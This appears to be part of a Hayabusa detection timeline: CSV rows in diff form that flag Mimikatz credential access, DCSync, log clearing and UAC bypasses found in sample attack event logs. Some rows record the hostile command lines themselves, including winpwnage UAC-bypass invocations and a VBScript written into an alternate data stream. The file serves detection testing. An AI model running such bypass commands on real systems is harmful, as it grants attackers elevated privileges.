+2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,../hayabusa-rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx
+2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,CredAccess,LSASS Memory Dump,,../hayabusa-rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx
+2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,CredAccess,Accessing WinAPI in PowerShell for Credentials Dumping,,../hayabusa-rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx
+2019-05-03 02:21:42.678 +09:00,SANS-TBT570,1102,high,Evas,Security Log Cleared,User: student,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privilegedebug-tokenelevate-hashdump.evtx
+2019-05-04 00:20:20.711 +09:00,SANS-TBT570,1102,high,Evas,Security Log Cleared,User: student,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx
+2019-05-04 00:20:27.359 +09:00,SANS-TBT570,4672,info,,Admin Logon,User: tbt570 | LID: 0x1861f7,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx
+2019-05-04 00:20:28.308 +09:00,SANS-TBT570,4634,info,,Logoff,User: tbt570 | LID: 0x1861f7,../hayabusa-rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx
+2019-05-08 11:10:43.487 +09:00,DC1.insecurebank.local,4662,high,CredAccess,Mimikatz DC Sync,,../hayabusa-rules/sigma/builtin/security/win_dcsync.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_DCSync_4662.evtx
+2019-05-08 11:10:43.487 +09:00,DC1.insecurebank.local,4662,critical,CredAccess,Active Directory Replication from Non Machine Account,,../hayabusa-rules/sigma/builtin/security/win_ad_replication_non_machine_account.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_DCSync_4662.evtx
+2019-05-08 11:10:43.487 +09:00,DC1.insecurebank.local,4662,critical,CredAccess,Active Directory Replication from Non Machine Account,,../hayabusa-rules/sigma/builtin/security/win_ad_replication_non_machine_account.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_DCSync_4662.evtx
+2019-05-08 11:10:43.487 +09:00,DC1.insecurebank.local,4662,critical,CredAccess,Active Directory Replication from Non Machine Account,,../hayabusa-rules/sigma/builtin/security/win_ad_replication_non_machine_account.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_DCSync_4662.evtx
+2019-05-08 12:00:11.778 +09:00,DC1.insecurebank.local,1102,high,Evas,Security Log Cleared,User: administrator,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_security_dcshadow_4742.evtx
+2019-05-08 12:00:37.572 +09:00,DC1.insecurebank.local,4742,high,CredAccess,Possible DC Shadow,,../hayabusa-rules/sigma/builtin/security/win_possible_dc_shadow.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_security_dcshadow_4742.evtx
+2019-05-08 12:00:37.586 +09:00,DC1.insecurebank.local,4742,high,CredAccess,Possible DC Shadow,,../hayabusa-rules/sigma/builtin/security/win_possible_dc_shadow.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_security_dcshadow_4742.evtx
+2019-05-09 10:59:28.669 +09:00,IEWIN7,13,high,Persis,Bypass UAC Using Event Viewer,,../hayabusa-rules/sigma/registry_event/win_re_bypass_uac_using_eventviewer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx
+2019-05-09 10:59:28.684 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13982 | PID: 3752 | PGUID: 365ABB72-8980-5CD3-0000-0010972D1F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx
+2019-05-09 10:59:28.684 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\eventvwr.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2704 | Src PGUID: 365ABB72-88DC-5CD3-0000-00100DA51A00 | Tgt PID: 3752 | Tgt PGUID: 365ABB72-8980-5CD3-0000-0010972D1F00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx
+2019-05-09 10:59:28.950 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x1394a | PID: 3884 | PGUID: 365ABB72-8980-5CD3-0000-00105F451F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx
+2019-05-09 10:59:29.090 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\eventvwr.exe"" | LID: 0x1394a | PID: 3840 | PGUID: 365ABB72-8980-5CD3-0000-0010134D1F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx
+2019-05-09 10:59:29.090 +09:00,IEWIN7,1,critical,Evas | PrivEsc,UAC Bypass via Event Viewer,,../hayabusa-rules/sigma/process_creation/proc_creation_win_sysmon_uac_bypass_eventvwr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx
+2019-05-09 10:59:29.090 +09:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx
+2019-05-09 11:00:01.794 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\System32\wsqmcons.exe | Process: C:\Windows\System32\wsqmcons.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 272 | PGUID: 365ABB72-89A1-5CD3-0000-001013732100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx
+2019-05-09 11:07:51.131 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdclt.exe"" /kickoffelev | Process: C:\Windows\System32\sdclt.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13982 | PID: 3836 | PGUID: 365ABB72-8B77-5CD3-0000-0010E8FD2900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx
+2019-05-09 11:07:51.131 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\sdclt.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2704 | Src PGUID: 365ABB72-88DC-5CD3-0000-00100DA51A00 | Tgt PID: 3836 | Tgt PGUID: 365ABB72-8B77-5CD3-0000-0010E8FD2900,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx
+2019-05-09 11:07:56.149 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\sdclt.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 2704 | Src PGUID: 365ABB72-88DC-5CD3-0000-00100DA51A00 | Tgt PID: 3836 | Tgt PGUID: 365ABB72-8B77-5CD3-0000-0010E8FD2900,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx
+2019-05-09 11:08:00.446 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /c notepad.exe | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ? | LID: 0x1394a | PID: 2264 | PGUID: 365ABB72-8B80-5CD3-0000-001065512A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx
+2019-05-09 11:08:00.446 +09:00,IEWIN7,1,medium,PrivEsc,Sdclt Child Processes,,../hayabusa-rules/sigma/process_creation/proc_creation_win_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx
+2019-05-09 11:52:18.765 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\wscript.exe.manifest | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 1900 | PGUID: 365ABB72-9570-5CD3-0000-00103FC90A00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
+2019-05-09 11:52:18.844 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\makecab.exe"" C:\Users\IEUser\AppData\Local\Temp\wscript.exe.manifest C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp | Process: C:\Windows\System32\makecab.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 1292 | PGUID: 365ABB72-95E2-5CD3-0000-001097410F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
+2019-05-09 11:52:18.922 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 3636 | PGUID: 365ABB72-95E2-5CD3-0000-0010C6440F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
+2019-05-09 11:52:18.953 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 3620 | PGUID: 365ABB72-95E2-5CD3-0000-001083470F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
+2019-05-09 11:52:18.969 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 2420 | PGUID: 365ABB72-95E2-5CD3-0000-001074490F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
+2019-05-09 11:52:19.250 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13aa4 | PID: 3536 | PGUID: 365ABB72-95E3-5CD3-0000-00100C650F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
+2019-05-09 11:52:21.250 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\makecab.exe"" C:\Windows\System32\wscript.exe C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp | Process: C:\Windows\System32\makecab.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 3828 | PGUID: 365ABB72-95E5-5CD3-0000-00101F720F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
+2019-05-09 11:52:21.265 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 3824 | PGUID: 365ABB72-95E5-5CD3-0000-00108F720F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
+2019-05-09 11:52:21.281 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 2852 | PGUID: 365ABB72-95E5-5CD3-0000-001065730F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
+2019-05-09 11:52:21.297 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 2364 | PGUID: 365ABB72-95E5-5CD3-0000-001033750F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
+2019-05-09 11:52:21.594 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13aa4 | PID: 2800 | PGUID: 365ABB72-95E5-5CD3-0000-0010E1890F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
+2019-05-09 11:52:23.500 +09:00,IEWIN7,15,info,,Alternate Data Stream Created,Path: C:\Users\IEUser\AppData | Process: C:\Windows\system32\cmd.exe | PID: 2812 | PGUID: 365ABB72-95E7-5CD3-0000-001046950F00 | Hash: Unknown,../hayabusa-rules/hayabusa/sysmon/events/15_AlternateDataStreamCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
+2019-05-09 11:52:23.500 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData:tghjx5xz2ky.vbs | Process: C:\Windows\system32\cmd.exe | PID: 2812 | PGUID: 365ABB72-95E7-5CD3-0000-001046950F00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
+2019-05-09 11:52:23.500 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /C ""echo Dim objShell:Dim oFso:Set oFso = CreateObject(""Scripting.FileSystemObject""):Set objShell = WScript.CreateObject(""WScript.Shell""):command = ""powershell.exe"":objShell.Run command, 0:command = ""C:\Windows\System32\cmd.exe /c """"start /b """""""" cmd /c """"timeout /t 5 >nul&&del C:\Windows\wscript.exe&&del C:\Windows\wscript.exe.manifest"""""""""":objShell.Run command, 0:Set objShell = Nothing > ""C:\Users\IEUser\AppData:tghjx5xz2ky.vbs"""" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 2812 | PGUID: 365ABB72-95E7-5CD3-0000-001046950F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
+2019-05-09 11:52:23.500 +09:00,IEWIN7,1,low,Evas,Cmd Stream Redirection,,../hayabusa-rules/sigma/process_creation/proc_creation_win_redirect_to_stream.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
+2019-05-09 11:52:23.500 +09:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
+2019-05-09 11:52:23.531 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /C ""C:\Windows\wscript.exe ""C:\Users\IEUser\AppData:tghjx5xz2ky.vbs"""" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 3784 | PGUID: 365ABB72-95E7-5CD3-0000-001004970F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
+2019-05-09 12:25:24.896 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdclt.exe"" | Process: C:\Windows\System32\sdclt.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 3184 | PGUID: 365ABB72-9DA4-5CD3-0000-00102E692F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx
+2019-05-09 12:25:25.067 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /name Microsoft.BackupAndRestoreCenter | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\sdclt.exe"" | LID: 0x13add | PID: 2920 | PGUID: 365ABB72-9DA4-5CD3-0000-00107F7A2F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx
+2019-05-09 12:25:25.067 +09:00,IEWIN7,1,medium,PrivEsc,Sdclt Child Processes,,../hayabusa-rules/sigma/process_creation/proc_creation_win_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx
+2019-05-10 21:21:57.077 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 7 -p c:\Windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13a4f | PID: 4076 | PGUID: 365ABB72-6CE5-5CD5-0000-00104BC61B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx
+2019-05-10 21:22:02.434 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\system32\mmc.exe | Process: c:\python27\python.exe | PID: 4076 | PGUID: 365ABB72-6CE5-5CD5-0000-00104BC61B00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx
+2019-05-10 21:22:08.465 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""c:\users\ieuser\appdata\local\temp\system32\mmc.exe"" ""c:\users\ieuser\appdata\local\temp\system32\perfmon.msc"" | Process: C:\Users\IEUser\AppData\Local\Temp\system32\mmc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\perfmon.exe"" | LID: 0x13a11 | PID: 1644 | PGUID: 365ABB72-6CF0-5CD5-0000-0010140F1C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx
+2019-05-10 21:22:08.465 +09:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx
+2019-05-10 22:32:48.200 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 9 -p c:\Windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x14241 | PID: 2796 | PGUID: 365ABB72-7D80-5CD5-0000-00100AD01300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx
+2019-05-10 22:32:48.412 +09:00,IEWIN7,13,high,Persis,Bypass UAC Using Event Viewer,,../hayabusa-rules/sigma/registry_event/win_re_bypass_uac_using_eventviewer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx
+2019-05-10 22:32:58.549 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""c:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\CompMgmtLauncher.exe"" | LID: 0x141f8 | PID: 2076 | PGUID: 365ABB72-7D86-5CD5-0000-0010CC2E1400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx
+2019-05-10 22:33:29.424 +09:00,IEWIN7,1,info,,Process Created,"Cmd: whoami /priv | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: ""c:\Windows\System32\cmd.exe"" | LID: 0x141f8 | PID: 2524 | PGUID: 365ABB72-7DA9-5CD5-0000-00100ED31400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx
+2019-05-10 22:33:29.424 +09:00,IEWIN7,1,high,PrivEsc | Disc,Run Whoami Showing Privileges,,../hayabusa-rules/sigma/process_creation/proc_creation_win_whoami_priv.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx
+2019-05-10 22:33:29.424 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx
+2019-05-10 22:33:29.424 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx
+2019-05-10 22:49:29.586 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x14241 | PID: 3552 | PGUID: 365ABB72-8169-5CD5-0000-0010D7982300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx
+2019-05-10 22:49:29.789 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\NTWDBLIB.dll | Process: c:\python27\python.exe | PID: 3552 | PGUID: 365ABB72-8169-5CD5-0000-0010D7982300,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx
+2019-05-10 22:49:29.789 +09:00,IEWIN7,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx
+2019-05-10 22:49:34.946 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | PID: 1700 | PGUID: 365ABB72-816E-5CD5-0000-0010FEB62300,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx
